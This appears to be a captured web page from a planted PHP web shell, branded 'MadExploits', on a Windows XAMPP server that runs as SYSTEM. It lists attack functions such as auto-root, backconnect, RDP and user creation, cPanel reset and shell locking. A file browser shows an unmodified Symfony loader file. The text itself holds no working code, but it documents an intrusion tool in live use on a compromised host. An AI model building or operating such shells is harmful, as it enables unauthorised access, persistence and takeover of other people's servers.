Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
phpMyAdmin /
vendor /
symfony /
config /
Loader /
[ HOME SHELL ]
Name
Size
Permission
Action
DelegatingLoader.php
1.24
KB
-rw-rw-rw-
FileLoader.php
6.58
KB
-rw-rw-rw-
GlobFileLoader.php
714
B
-rw-rw-rw-
Loader.php
1.81
KB
-rw-rw-rw-
LoaderInterface.php
1.33
KB
-rw-rw-rw-
LoaderResolver.php
1.55
KB
-rw-rw-rw-
LoaderResolverInterface.php
795
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : GlobFileLoader.php
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Config\Loader; /** * GlobFileLoader loads files from a glob pattern. * * @author Fabien Potencier <fabien@symfony.com> */ class GlobFileLoader extends FileLoader { /** * {@inheritdoc} */ public function load($resource, $type = null) { return $this->import($resource); } /** * {@inheritdoc} */ public function supports($resource, $type = null) { return 'glob' === $type; } }
Close